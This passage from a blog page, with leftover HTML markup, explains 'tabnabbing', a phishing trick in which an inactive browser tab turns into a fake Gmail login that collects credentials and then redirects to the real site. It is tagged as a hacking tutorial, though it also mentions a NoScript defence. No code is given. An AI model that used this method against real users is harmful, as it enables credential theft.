takes advantage of user trust and inattention to detail, or what Raskin calls "the perceived immutability of tabs." Then, as the user scans their many open tabs, the favicon and title act as a strong visual cue, and the user will most likely simply think they left a Gmail tab open.</span></span></div> <div> <span class="Apple-style-span"><span id="7140679708706166316"><br /></span></span></div> <div> <span class="Apple-style-span"><span id="7140679708706166316">"When they click back to the fake Gmail tab, they'll see the standard Gmail login page, assume they've been logged out, and provide their credentials to log in," Raskin explained. "After the user has enter they have entered their login information and sent it back your server, you redirect them to Gmail. Because they were never logged out in the first place, it will appear as if the login was successful."</span></span></div> </div> <div> <span class="Apple-style-span"><span id="7140679708706166316"><br /></span></span></div> <div> <span class="Apple-style-span"><span id="7140679708706166316"><i>For Firefox users with the Noscript plugin, there is an update to the program that can block these types of tabnabbing attacks.</i></span></span></div> </div> <br /> <div> <br /></div> -- <br /> <div dir="ltr"> Regards,<br /> Hardeep Singh<br /> (<a href="http://www.fb.com/h4rdeep" target="_blank">www.fb.com/h4rdeep</a>)</div> <br /></div>

Hacking Hacking Tutorials Phishing Social Engineering Tabnapping Tutorials Phishing Attack Using Tabnabbing

Most phishing attacks depend on an original deception. If you detect that you are at the wrong URL, or that something is amiss on a ...

Read more »